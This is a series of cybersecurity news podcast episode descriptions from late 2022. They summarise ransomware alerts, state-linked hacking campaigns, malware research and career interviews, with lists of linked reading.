Antwerp's city services down after hackers attack digital partner (BleepingComputer)

Russian hacking group spoofed Microsoft login page of US military supplier: report (The Record by Recorded Future)

Mustang Panda Uses the Russian-Ukrainian War to Attack Europe and Asia Pacific Targets (BlackBerry)

Inside the Face-Off Between Russia and a Small Internet Access Firm (New York Times)

Apiiro’s AI engine detected a software supply chain attack in PyPI (Apiiro | Cloud-Native Application Security)

Anatomizing CryptosLabs: a scam syndicate targeting French-speaking Europe for years (Group-IB)

CISA Alert AA22-335A – #StopRansomware: Cuba Ransomware [CISA Cybersecurity Alerts] Dec 07, 2022

The FBI and CISA are releasing this alert to disseminate known Cuba Ransomware Group indicators of compromise and TTPs identified through FBI investigations.

FBI and CISA would like to thank BlackBerry, ESET, The National Cyber-Forensics and Training Alliance (NCFTA), and Palo Alto Networks for their contributions to this CSA.

AA22-335A Alert, Technical Details, and Mitigations

For a downloadable copy of IOCs, see AA22-335A.stix

Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.

Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.

No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.

Cyberespionage, privateering, hacktivism and influence operations, in Ukraine, Russia, the Middle East, and elsewhere. Criminals need quality control, too. A new entry in CISA’s KEV Catalog. Dec 06, 2022

A Chinese cyberespionage campaign is believed to be active in the Middle East. Poor quality control turns ransomware into a wiper, and a typo crashes a cryptojacker. A large DDoS attack is reported to have hit a Russian state-owned bank. Privateers compromise Western infrastructure to stage cyberattacks. Cyber operations against national morale. A look at the Vice Society. Ben Yelin on the growing concerns over TicTok. Ann Johnson from Afternoon Cyber Tea speaks with Charles Blauner about the evolution of the CISO role. And CISA has added an entry to its Known Exploited Vulnerabilities Catalog.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/232

Selected reading.

BackdoorDiplomacy Wields New Tools in Fresh Middle East Campaign (Bitdefender Labs)

The Story of a Ransomware Turning into an Accidental Wiper | FortiGuard Labs (Fortinet Blog)

Syntax errors are the doom of us all, including botnet authors (Ars Technica)

Russia's No. 2 bank VTB suffers largest DDoS in history (Computing)

Russia compromises major UK and US organisations to attack Ukraine (Lupovis)

Russia’s online attacks target Ukrainians’ feelings (POLITICO)

Vice Society: Profiling a Persistent Threat to the Education Sector (Unit 42)

CISA Adds One Known Exploited Vulnerability to Catalog (CISA)

Swapping cyberattacks in a hybrid war. Privateers or just a side-hustle? US CSRB will investigate Lapsu$ Group. Notes on the cyber underworld. Dec 05, 2022

Wiper malware hits Russian targets. Microsoft sees an intensification of Russian cyber operations against Ukraine. State policy, privateering, or an APT side-hustle? The US Cyber Safety Review Board will investigate the Lapsu$ Group. Rackspace works to remediate a security incident. The Schoolyard Bully Trojan harvests credentials. Grayson Milbourne of OpenText Security Solutions on attacks on common open source dev libraries. Rick Howard looks at CISO career paths. And trends in ransomware: cybercrime succeeds when the gang runs like a business.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/231

Selected reading.

CryWiper: fake ransomware (Kaspersky).

CryWiper data wiper targets Russian courts and mayors' offices (Computing)

Never-before-seen malware is nuking data in Russia’s courts and mayors’ offices (Ars Technica)

Russian regions attacked by new wiper posing as ransomware (Cybernews)

Preparing for a Russian cyber offensive against Ukraine this winter (Microsoft On the Issues)

Russia coordinating Ukraine hacks with missiles, could increasingly target European allies, Microsoft warns (POLITICO)

Russia Is Boosting Its Cyber Attacks on Ukraine, Allies, Microsoft Says (Bloomberg.com)

Hackers linked to Chinese government stole millions in Covid benefits (NBC News)

Cyber Safety Review Board to Conduct Second Review on Lapsus$ (US Department of Homeland Security)

Rackspace: Ongoing Exchange outage caused by security incident (BleepingComputer)

Schoolyard Bully Trojan Facebook Credential Stealer (Zimperium)

The Professionalization of Ransomware: How Gangs Are Becoming Like Businesses (LookingGlass Cyber Solutions Inc.)

Rohit Dhamankar: Never close doors prematurely. [Vice President] [Career Notes] Dec 04, 2022

Rohit Dhamankar from Fortra’s Alert Logic sits down with Dave Bittner to share his experiences as he navigates the industry. Rohit has over 15 years of security industry experience across product strategy, threat research, product management and development, and customer solutions. Before Alert Logic he served in Product roles for Live Oak Venture Capital at Infocyte and Razberi Technologies. He has previously worked in senior roles in several start-up companies in security analytics, intrusion detection/prevention, end-point protection, and security risk and compliance, including VP, Click Labs Solutions at Click Security, acquired by AlertLogic, and he was a Co-Founder of Jumpshot, acquired by Avast. Rohit shares the advise of never closing a door too prematurely, because you never know what could be behind the door waiting for you. We thank Rohit for sharing his story.

Old malware returns in a new way. [Research Saturday] Dec 03, 2022

Jeremy Kennelly and Sulian Lebegue from Mandiant sit down with Dave to discuss their research "From RM3 to LDR4: URSNIF Leaves Banking Fraud Behind? One of the oldest and most successful banking fraud malwares, URSNIF, which caused an estimated “tens of millions of dollars in losses”, has been discovered by researchers to have been re-tooled into a generic backdoor, dubbed “LDR4”.

This new varient was first observed in June 2022. Mandiant researchers believe that the same threat actors who operated the RM3 variant of URSNIF are likely behind LDR4. They say "given the success and sophistication RM3 previously had, LDR4 could be a significantly dangerous variant—capable of distributing ransomware—that should be watched closely."

The research can be found here:

From RM3 to LDR4: URSNIF Leaves Banking Fraud Behind

Cuba ransomware pulls in $60 million. CISA releases three ICS advisories. Google announces new support for Ukraine. DDoSing the Vatican. Google supports Ukrainian startups in wartime. Dec 02, 2022

Cuba ransomware pulls in $60 million. CISA releases three ICS advisories. DDoSing the Vatican. Andrea Little Limbago from Interos on the implications of Albania cutting off diplomatic ties with Iran. Our space correspondent Maria Varmazis speaks with Brandon Bailey about Space Attack Research and Tactic Analysis matrix. And how Google supports Ukrainian startups in wartime.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/230

Selected reading.

Alert (AA22-335A) #StopRansomware: Cuba Ransomware (CISA)

Novel News on Cuba Ransomware: Greetings From Tropical Scorpius (Palo Alto Networks Unit 42)

New ways we're supporting Ukraine (Google)

25 new startup recipients of the Ukraine Support Fund (Google)

Vatican shuts down its website amid hacking attempts (Cybernews)

Cyberespionage, cybercrime, and patriotic hacktivism. The Heliconia framework described. Cyber risk for the telecom and healthcare sectors. Notes on the hybrid war. Predictions for 2023. Dec 01, 2022

A new backdoor, courtesy of the DPRK. The Medibank breach is all over but the shouting (or, all over but the suing and the arresting). Risks and opportunities in telecom’s shift to cloud. Cyber risk in healthcare. An assessment of Russian cyber warfare. Robert M. Lee from Dragos assesses the growing value of the ICS security market. Our guest is Cecilia Seiden of TransUnion to discuss their 2022 Consumer Holiday Shopping Report. And it’s December, which means…predictions.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/229

Selected reading.

Who’s swimming in South Korean waters? Meet ScarCruft’s Dolphin (ESET)

Medibank hackers announce ‘case closed’ and dump huge data file on dark web (the Guardian)

New details on commercial spyware vendor Variston (Google)

Risks and opportunities in telecom’s shift to cloud. (CyberWire)

Moody’s discusses cyber risk in healthcare. (CyberWire)

'Do something:' Ukraine works to heal soldiers' mental scars (AP NEWS)

Reformed Russian Cybercriminal Warns That Hatred Spreads Hacktivism (Wall Street Journal)

Cybersecurity predictions for 2023. (CyberWire)

LockBit 3.0 and Punisher ransomware described. Leave that USB right in the parking lot where you found it. Killnet’s woofing. Lilac Wolverine’s big new BEC. And World Cup scams. Nov 30, 2022

Has LockBit 3.0 been reverse engineered? A COVID lure contains a Punisher hook. A Chinese cyberespionage campaign uses compromised USB drives. Lilac Wolverine exploits personal connections for BEC. Killnet claims to have counted coup against the White House. Tim Starks from the Washington Post has the FCC’s Huawei restrictions and ponders what congress might get done before the year end. Our guest is Tom Eston from Bishop Fox with a look Inside the Minds & Methods of Modern Adversaries. And, of course, scams, hacks, and other badness surrounding the World Cup.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/228

Selected reading.

LockBit 3.0 ‘Black’ attacks and leaks reveal wormable capabilities and tooling (Sophos News)

Punisher Ransomware Spreading Through Fake COVID Site (Cyble)

Always Another Secret: Lifting the Haze on China-nexus Espionage in Southeast Asia (Mandiant)

BEC Group Compromises Personal Accounts and Pulls Heartstrings to Launch Mass Gift Card Attacks (Abnormal Security)

Killnet Claims Attacks Against Starlink, Whitehouse.gov, and United Kingdom Websites (Trustwave)

Scammers on the pitch: Group-IB identifies online threats to fans at FIFA World Cup 2022 in Qatar (Group-IB)

DDoS as a holiday-season threat to e-commerce. TikTok challenge spreads malware. Meta's GDPR fine. US Cyber Command describes support for Ukraine's cyber defense. Nov 29, 2022

DDoS as a holiday-season threat to e-commerce. A TikTok challenge spreads malware. Meta's GDPR fine. Mr. Security Answer Person John Pescatore has thoughts on phishing resistant MFA. Joe Carrigan describes Intel’s latest efforts to thwart deepfakes. And US Cyber Command describes support for Ukraine's cyber defense.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/227

Selected reading.

Holiday DDoS Cyberattacks Can Hurt E-Commerce, Lack Legal Remedy (Bloomberg Law)

TikTok ‘Invisible Body’ challenge exploited to push malware (BleepingComputer)

$275M Fine for Meta After Facebook Data Scrape (Dark Reading)

Before the Invasion: Hunt Forward Operations in Ukraine (U.S. Cyber Command)

Keeping pentesting tools out of criminal hands. Updates from an intensified cyber phase in Russia’s hybrid war. Fars reports sustaining a cyber attack. The most common password remains “password.” Nov 28, 2022

Nighthawk’s at the diner (but maybe not on the crooks’ menu). Internet service in Ukraine and Moldova is interrupted by strikes against Ukraine's power grid. Sandworm renews ransomware activity against Ukrainian targets. Russian cyber-reconnaissance seen at a Netherlands LNG terminal. European Parliament votes to declare Russia a terrorist state (and Russia responds with cyberattacks and terroristic threats). Carole Theriault reports on where these kids today are getting their news. Malek Ben Salem from Accenture on digital identity in Web 3.0. And, hey, the new list of most commonly used passwords looks...depressingly familiar.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/226

Selected reading.

Sec firm MDSec slams Proofpoint for post on pen-testing framework (iTWire)

Nighthawk: With Great Power Comes Great Responsibility - MDSec

Cyberattack Hits Iran's Fars News Agency (RadioFreeEurope/RadioLiberty)

Iran’s Fars news agency is hit by cyberattacks, blames Israel (Times of Israel)

Ukraine and Moldova suffer internet disruptions after Russian missile strikes (The Record by Recorded Future)

New ransomware attacks in Ukraine linked to Russian Sandworm hackers (BleepingComputer)

Russian hackers targeting Dutch gas terminal: report (NL Times)

Russia labelled state sponsor of terrorism as missile strikes leave Ukraine without power (The Telegraph)

Killnet Group Claims Responsibility for European Parliament Cyber Attack (Digit)

European Parliament hit by 'sophisticated' cyberattack (Deutsche Welle)

European Parliament website suffers 'sophisticated' cyber attack after Russia terrorism vote (Computing)

Hackers Temporarily Take Down European Parliament Website (Wall Street Journal)

Guess the most common password. Hint: We just told you (Register)

Laura Whitt-Winyard: Securing the world. [CISO] [Career Notes] Nov 27, 2022

Laura Whitt-Winyard, CISO from Malwarebytes, sits down to share her story, beginning with a desire to be a pediatric oncologist that she later discovered was not the path for her. Laura was bouncing around from job to job until she bought her first computer, and a light bulb went off in her head. She set out to make it her goal to learn about this new, interesting field and grow within it. Now as a successful CISO, she wants to make the world more secure and goes from company to company to complete her goal. She considers herself a servant leader whose goal is the greater good. She compares her role to football, explaining that she is not the quarterback, but the center for the team. She believes she is the center that paves the path for the quarterbacks on her team to reduce the noise, to give the quarterback all the tools that they need to do their jobs and do their jobs well. We thank Laura for sharing her story.

Encore: The secrets behind Docker. Nov 26, 2022

Alon Zahavi from CyberArk, joins Dave Bittner on this episode to discuss CyberArk's work in conjunction with Patch Tuesday. CyberArk published about how Docker inadvertently created a new vulnerability and what happens when it's exploited.

CyberArk's research concluded that an attacker may execute files with capabilities or setuid files in order to escalate its privileges up to root level. CyberArk found the new vuln in some of Microsoft’s Docker images, caused by misuse of Linux capabilities, a powerful additional layer of security that gives admins the ability to assign capabilities and privileges to processes and files in the Linux system

The research can be found here:

How Docker Made Me More Capable and the Host Less Secure

Interview Select: Perry Carpenter on his new book "The Security Culture Playbook." [CW Pro] Nov 25, 2022

This interview is from June 3rd, 2022 originally aired as a shortened version on the CyberWire Daily Podcast. In this extended interview, Dave Bittner sits down Perry Carpenter, host of 8th Layer Insights to discuss his new book "The Security Culture Playbook: An Executive Guide To Reducing Risk and Developing Your Human Defense Layer."

Research Briefing: Emotet's return. LodaRAT improvements. Callback phishing leads to data theft extortion. [CW Pro] Nov 24, 2022

Emotet's return. LodaRAT improvements. Callback phishing leads to data theft extortion.

Watch out for abuse of pentesting tools. Cyber attack on Guadeloupe. Ducktail’s evolution. Cybersecurity for ports. ICS security advisories. And stay safe shopping during the holidays. Nov 23, 2022

Another pentesting tool may soon be abused by threat actors. Cyberattack disrupts Guadeloupe. Ducktail evolves and expands. Warning of the potential disruption cyberattacks might work against European ports. CISA releases eight industrial control system advisories. Patrick Tiquet, VP of Security and Architecture at Keeper Security, talks about the FedRAMP authorization process. Bryan Vorndran of the FBI Cyber Division with reflections on ransomware. And stay safe on Black Friday (and Cyber Monday, and Panic Saturday, and…you get the picture.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/225

Selected reading.

Nighthawk: An Up-and-Coming Pentest Tool Likely to Gain Threat Actor Notice (Proofpoint)

Making Cobalt Strike harder for threat actors to abuse (Google Cloud Blog)

Guadeloupe government fights 'large-scale' cyberattack (AP NEWS)

Vietnam-Based Ducktail Cybercrime Operation Evolving, Expanding (SecurityWeek)

Cyber as important as missile defences - ex-NATO general (Reuters)

CISA Releases Eight Industrial Control Systems Advisories (CISA)

Black Friday and Cyber Monday risks. (CyberWire)

Recent criminal activity–it’s as opportunistic as ever. Cyber risk to the pharma sector. Updates on the hybrid war. Returning Cobalt Strike to the legitimate red teams. Nov 22, 2022

Daixin Team claims ransomware attack against AirAsia. DraftKings users suffer credential harvesting and paycard theft. Assessing cyber risk in the US pharmaceutical industry. Killnet claims successes few others can discern. In Ukraine, kinetic attacks on IT infrastructure eclipse cyberattacks. Carole Theriault on digital echo chambers and what's in it for us. Nancy Wang from Forta's Alert Logic discusses how she is helping more young women get into the STEM field and leadership positions. Google seeks to render Cobalt Strike less useful to threat actors.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/224

Selected reading.

Daixin Team claims AirAsia ransomware attack with five million customer records leaked (Tech Monitor)

Daixin Ransomware Gang Steals 5 Million AirAsia Passengers' and Employees' Data (The Hacker News)

DraftKings Users Hacked, Money In Account "Cashed Out" (Action Network)

DraftKings says no evidence systems were breached following report of a hack (CNBC)

Assessing cyber risk in the US pharmaceutical industry. (CyberWire)

Killnet DDoS hacktivists target Royal Family and others (ComputerWeekly.com)

Ukraine Data Centers Became Physical Targets When Cyber Attacks Failed (Meritalk)

Making Cobalt Strike harder for threat actors to abuse (Google Cloud Blog)

Google seeks to make Cobalt Strike useless to attackers (Help Net Security)

Google Releases YARA Rules to Disrupt Cobalt Strike Abuse (Dark Reading)

Google releases 165 YARA rules to detect Cobalt Strike attacks (BleepingComputer)

Callback phishing offers to solve your problem (it won’t). Mustang Panda’s recent activities. DEV0569’s malvertising campaign. 10 indicted in BEC case. Developing a cyber auxiliary force. Nov 21, 2022

Luna Moth's callback phishing offers an unpleasant and less familiar form of social engineering. New activity by China's Mustang Panda is reported. DEV0569 is using malvertising to distribute Royal ransomware. US indicts 10 in a business email compromise case. Developing a cyber auxiliary. Dave Bittner sits down with AJ Nash from ZeroFox to discuss holiday scams. Our own Rick Howard speaks with us about cloud security. And beware of Black Friday scams.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/223

Selected reading.

Threat Assessment: Luna Moth Callback Phishing Campaign (Unit 42)

DEV-0569 finds new ways to deliver Royal ransomware, various payloads (Microsoft Security)

Earth Preta Spear-Phishing Governments Worldwide (Trend Micro)

EXCLUSIVE: Rounding up a cyber posse for Ukraine (The Record by Recorded Future)

Tech for good: How the IT industry is helping Ukraine (Computing)

10 Charged in Business Email Compromise and Money Laundering Schemes Targeting Medicare, Medicaid, and Other Victims (US Department of Justice)

Black Friday and Cyber Monday risks. (CyberWire)

Omer Singer: The offense and the defense of cybersecurity. [Strategy] [Career Notes] Nov 20, 2022

Omer Singer, Lead Cybersecurity Strategist from Snowflake, sits down to share his experience getting into the cybersecurity field. Growing up, he knew he wanted to work with computers, but he just didn't know what he wanted to do within the field. His college gave him great hands-on experience to then transition into the workforce. He's played both on the offense and defense of cybersecurity, and he says that experience showed him and he "kind of saw firsthand, uh, what a well funded and motivated, uh, team of cybersecurity experts can do and it's pretty scary." In addition, Omer is a big advocate for encouraging other security professionals to learn data skills, and strongly stands by the belief that the future of cybersecurity is in borrowing from modern data analytics tools and techniques that enable consistent risk reduction. He also makes it a priority to invest in his people, believing that this unlocks intrinsic motivation that enables a ton of personal growth and accomplishment, and is a big believer in the OKR system for enabling security operations and avoiding burnout. We thank Omer for sharing his story.

Another infection with new malware. [Research Saturday] Nov 19, 2022

Larry Cashdollar, Principal Security Intelligence Response Engineer from Akamai Technologies, joins Dave to talk about their research on "KmsdBot: The Attack and Mine Malware." Akamai's Security Research team has found a new malware that infected their honeypot, which they have dubbed KmsdBot.

The research states "The malware attacks using UDP, TCP, HTTP POST, and GET, along with a command and control infrastructure (C2), which communicates over TCP." The botnet targets weak login credentials and then infects systems via an SSH connection.

The research can be found here:

KmsdBot: The Attack and Mine Malware

Government security advisories, and the difficulty of recovering from ransomware attacks. Authority for offensive cyber under deliberation. Google wins Glupteba suit. Nov 18, 2022

CISA and its partners issue a Joint Advisory on the Hive ransomware-as-a-service operation. Ransomware continues to trouble governments, internationally and at all levels. The US Defense Department may see enhanced authority to conduct offensive cyber operations. Russian attacks on Ukrainian infrastructure remain kinetic, as missiles show up, but cyberattacks don’t. Kevin Magee from Microsoft about leveraging cybersecurity apprentices. Our guest is Paul Giorgi from XM Cyber describing creative attack path in enterprise networks.And, hey, glupost’ [GLUE-post]–don’t mess with Google’s lawyers.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/222

Selected reading.

CISA Alert AA22-321A – #StopRansomware: Hive Ransomware. (CyberWire)

#StopRansomware: Hive Ransomware (CISA)

Vanuatu: Hackers strand Pacific island government for over a week (BBC News)

Ransom attack cripples Vanuatu government systems, forces staff to use pen and paper (The Sydney Morning Herald)

Ransomware incidents now make up majority of British government’s crisis management COBRA meetings (The Record by Recorded Future)

Suffolk County, N.Y., Hack Shows Ransomware Threat to Municipalities (Wall Street Journal)

Biden set to approve expansive authorities for Pentagon to carry out cyber operations (CyberScoop)

Red Lion Crimson (CISA)

Cradlepoint IBR600 (CISA)

A ruling in our legal case against the Glupteba botnet (Google)

CISA Alert AA22-321A – #StopRansomware: Hive Ransomware. [CISA Cybersecurity Alerts] Nov 18, 2022

The FBI, CISA, and the Department of Health and Human Services are releasing this alert to disseminate known Hive Ransomware Group indicators of compromise and TTPs identified through FBI investigations.

AA22-321A Alert, Technical Details, and Mitigations

Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.

Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.

No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.

Privileged insiders and the abuse of “Oops.” Nemesis Kitten exploits Log4Shell. TrojanOrders in the holiday season. Emotet’s back. RapperBot notes. And an arrest in the Zeus cybercrime case. Nov 17, 2022

Meta employees, contractors compromised customer accounts. Nemesis Kitten found in US Government network. Unpatched Magento instances hit with "TrojanOrders." Emotet has returned after three quiet months. DDoS attacks in game servers by RapperBot. Carole Theriault looks at long term lessons learned from the 2019 Capital One breach. FBI Cyber Division AD Bryan Vorndran updates us on cyber threats. And an alleged "Zeus" cybercrime boss has been arrested in Switzerland.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/221

Selected reading.

Meta Employees, Security Guards Fired for Hijacking User Accounts (Wall Street Journal)

CISA Alert AA22-320A – Iranian government-sponsored APT actors compromise federal network, deploy crypto miner, credential harvester. (CyberWire)

Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester (CISA)

Iranian government-linked hackers got into Merit Systems Protection Board’s network (Washington Post)

Iranian hackers compromise US government network in cryptocurrency generating scheme, officials say (CNN)

Magento stores targeted in massive surge of TrojanOrders attacks (BleepingComputer)

A Comprehensive Look at Emotet’s Fall 2022 Return (Proofpoint)

Notorious Emotet botnet returns after a few months off (Register)

Updated RapperBot malware targets game servers in DDoS attacks (BleepingComputer)

Russia’s cyber forces ‘underperformed expectations’ in Ukraine: senior US official (The Hill)

Suspected Zeus cybercrime ring leader ‘Tank’ arrested by Swiss police (BleepingComputer)

Getting tangled up in the blockchain. RDS vulnerabilities. The language of fraud. An offer of help to the G19.Draft Episode for Nov 16, 2022 Nov 16, 2022

Blockchains and cryptocurrency exchanges, and the risks they present. Vulnerabilities in Amazon RDS may expose PII. A study of the language of fraud. Tim Starks from Washington Post's Cybersecurity 202 on a lagging DHS cyber doomsday report. Our guest is Ashif Samnani of Cenovus Energy with insights from the world of OT cyber. And President Zelenskyy offers the benefit of Ukraine's experience with cyber warfare to the "G19”.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/220

Selected reading.

Cryptocurrency sector vulnerabilities. (CyberWire)

Oops, I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots (Mitiga)

Amazon RDS may expose PII. (CyberWire)

The specious language of fraud. (CyberWire)

Zelensky offers G20 leaders to use Ukrainian experience in cyber defense (Ukrinform)

Ukraine at D+265: A missile campaign punctuates diplomacy. (CyberWire)

CISA Alert AA22-320A – Iranian government-sponsored APT actors compromise federal network, deploy crypto miner, credential harvester. [CISA Cybersecurity Alerts] Nov 16, 2022

From mid-June through mid-July 2022, CISA conducted an incident response engagement at a Federal Civilian Executive Branch organization where CISA observed suspected advanced persistent threat activity. In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller, compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence.

AA22-320A Alert, Technical Details, and Mitigations

Malware Analysis Report MAR 10387061-1.v1

For more information on Iranian government-sponsored Iranian malicious cyber activity, see CISA’s Iran Cyber Threat Overview and Advisories webpage and FBI’s Iran Threats webpage.

CISA offers several no-cost scanning and testing services to help organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. See www.cisa.gov/cyber-hygiene-services

U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.

An update on three threat actors: Fangxiao, Killnet, and Billbug, one of them in it for money, another for the glory, and a third for the intell. Twitter and SMS 2FA. Zendesk patches. CISA adds a KEV. Nov 15, 2022

Fangxiao works ad scams enroute to other compromises. Killnet claims to have defaced a US FBI site. CISA registers another Known Exploited Vulnerability. Difficulties with Twitter's SMS 2FA system. Zendesk vulnerability discovered. Joe Carrigan explains registration bombing for email addresses. Our guest is Miles Hutchinson from Jumio with insights on defense against sophisticated ransomware attackers. And Billbug romps through Asian government agencies.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/219

Selected reading.

Fangxiao: a Chinese threat actor (Cyjax)

Fangxiao: A Phishing Threat Actor (Tripwire)

Russian hackers claim cyber attack on FBI website (Newsweek)

CISA Has Added One Known Exploited Vulnerability to Catalog (CISA)

Twitter’s SMS Two-Factor Authentication Is Melting Down (WIRED)

Varonis Threat Labs Discovers SQLi and Access Flaws in Zendesk (Varonis)

Billbug: State-sponsored Actor Targets Cert Authority, Government Agencies in Multiple Asian Countries (Symantec)

Chinese hackers target government agencies and defense orgs (BleepingComputer)

Researchers Say China State-backed Hackers Breached a Digital Certificate Authority (The Hacker News)

Software supply chains, C2C markets, criminals, and cyber auxiliaries in a hybrid war. CISA releases its Stakeholder Specific Vulnerability Categorization (SSVC). Nov 14, 2022

Software supply chain risk. Cyber risk across sectors. CISA releases Stakeholder Specific Vulnerability Categorization (SSVC). Sandworm is back in Russia's hybrid war. Another wiper campaign from a Russian cyber auxiliary. Malek Ben Salem from Accenture shares thoughts on future-proofing cloud security. Rick Howard previews the latest CSO Perspectives show. And the Australian Federal Police say they know who hacked Medibank. (and the AFP says they have a good track record getting international criminals).

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/218

Selected reading.

Exclusive: Russian software disguised as American finds its way into U.S. Army, CDC apps (Reuters)

Industries boost cyber defenses against growing number of attacks (Moodys)

CISA Releases SSVC Methodology to Prioritize Vulnerabilities (CISA)

Transforming the Vulnerability Management Landscape (CISA)

Russian Sandworm hackers deployed malware in Ukraine and Poland (Washington Post)

New “Prestige” ransomware impacts organizations in Ukraine and Poland (Microsoft)

Microsoft links Russia’s military to cyberattacks in Poland and Ukraine (Ars Technica)

Microsoft attributes ‘Prestige’ ransomware attacks on Ukraine and Poland to Russian group (The Record by Recorded Future)

Wipe it or exfiltrate? How Russia exploits edge infrastructure to disrupt and spy during wartime (SC Media)

Russia’s New Cyberwarfare in Ukraine Is Fast, Dirty, and Relentless (WIRED)

Russian military hackers linked to ransomware attacks in Ukraine (BleepingComputer)

Information on cyberattacks of the group UAC-0118 (FRwL) using the Somnia malware (CERT-UA#5185) (CERT-UA)

Ukraine says Russian hacktivists use new Somnia ransomware (BleepingComputer)

Russian hacktivists hit Ukrainian orgs with ransomware - but no ransom demands (Help Net Security)

Development of the Ukrainian Cyber Counter-Offensive (Trustwave)

Australian Federal Police say cybercriminals in Russia behind Medibank hack (The Record by Recorded Future)

Australia tells Medibank hackers: 'We know who you are' (TechCrunch)

Lauren Campanara: Learn to forgive yourself. [SOC Analyst] [Career Notes] Nov 13, 2022

Lauren Campanara, a SOC Analyst from ThreatX shares her story as she made the decision to break into cybersecurity after spending twelve years in the cosmetology field. She worked her way through college in a job she did not enjoy and felt trapped in while competing her online degree. She found ThreatX and fell in love with the work she is doing now. Lauren hopes to inspire others, especially women, to consider a challenging and rewarding career in cybersecurity. She shares what it's like to be in a field she was not happy in and how she was the only one standing in her way to achieve her goals. She says "Another huge obstacle worth mentioning is learning to get out of my own way. You are your own worst critic. I learned to be more forgiving of myself." She hopes her story will inspire others to follow their dreams and stop holding themselves back.

An in-depth look on the Crytox ransomware family. [Research Saturday] Nov 12, 2022

Deepen Desai from Zscaler sits down with Dave to talk about the Crytox ransomware family. First observed in 2020, Crytox is a ransomware family consisting of several stages of encrypted code that has fallen under the radar compared to other ransomware families. While other groups normally use double extortion attacks where data is both encrypted and held for ransom, Crytox does not perform this way.

The research says "The modus operandi of the group is to encrypt files on connected drives along with network drives, drop the uTox messenger application and then display a ransom note to the victim." It also shares how you may be compromised with this ransomware and goes through each stage in depth.

The research can be found here:

Technical Analysis of Crytox Ransomware

CSO Perspectives Bonus: Veterans Day special. Nov 11, 2022

Rick Howard (The Cyberwire’s Chief Analyst, CSO, and Senior Fellow), and the cast of the entire Cyberwire team, honor our U.S. veterans on this special day.

US midterms conclude without cyber interference. NATO on cyber defense. New APT41 activity identified. Russia’s FSB and SVR continue cyberespionage. Trends in phishing and API risks. Nov 10, 2022

There’s no sign that cyberattacks affected US vote counts. NATO meets to discuss the Atlantic Alliance’s Cyber Defense Pledge. A new APT41 subgroup has been identified. FSB phishing impersonates Ukraine's SSCIP. A look at Cozy Bear's use of credential roaming. Caleb Barlow shares tips on removing implicit bias from your hiring process. Our guests are Valerie Abend and Lisa O'Connor from Accenture with a look at the difference in how women and men pursue the top cyber leadership roles. And an update on Phishing trends and API threats.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/217

Selected reading.

Statement from CISA Director Easterly on the Security of the 2022 Elections (Cybersecurity and Infrastructure Security Agency):

No ‘Specific or Credible’ Cyber Threats Affected Integrity of Midterms, CISA Says (Nextgov.com)

U.S. vote counting unaffected by cyberattacks, officials say (PBS NewsHour)

What's 'Putin's chef' cooking up with talk on US meddling? (AP NEWS)

NATO’s 2022 Cyber Defense Pledge Conference - United States Department of State (United States Department of State)

Japan joins NATO cyber defense centre (Telecoms Tech News)

China casts wary eye as Japan signs up for Nato cybersecurity platform (South China Morning Post)

